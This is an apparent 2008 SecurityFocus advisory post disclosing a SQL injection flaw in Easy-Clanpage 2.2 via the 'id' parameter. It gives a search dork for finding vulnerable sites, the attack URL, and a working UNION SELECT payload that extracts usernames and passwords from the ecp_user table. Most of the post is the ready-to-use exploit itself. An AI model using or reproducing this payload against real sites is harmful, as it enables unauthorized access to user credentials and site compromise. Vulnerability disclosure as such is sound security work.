SecurityFocus

Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability Mar 20 2008 10:45AM
info shadowturk org

########################################################################
#

################## Easy-Clanpage v2.2 ###################

############# SQL İnjection VuLnerabiLity ##############

######## ##########

# #

########################################################################
#

#

# AUTHOR : MadNet

#

# HOMEPAGE : http://www.Shadowturk.org/

#

# Mail : MadNet[at]hackertr[dot]org

#

########################################################################
#

#

#Source: http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14

#

#

#Dork :"Easy-Clanpage v2.2"

########################################################################
##

#Vunl File :

#

#/inc/module/online.php

#

#EXPLOIT :

#

#http://www.[site].com/[path]/?section=user&action=details&id=

#

#EXAMPLE :

#

#-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/
from/**/ecp_user/**/where/**/userid=1/*

#

########################################################################
##

# www.ShadowTURK.Org

########################################################################
##

Thanks : Str0ke and Milw0rm

########################################################################
##

[ reply ]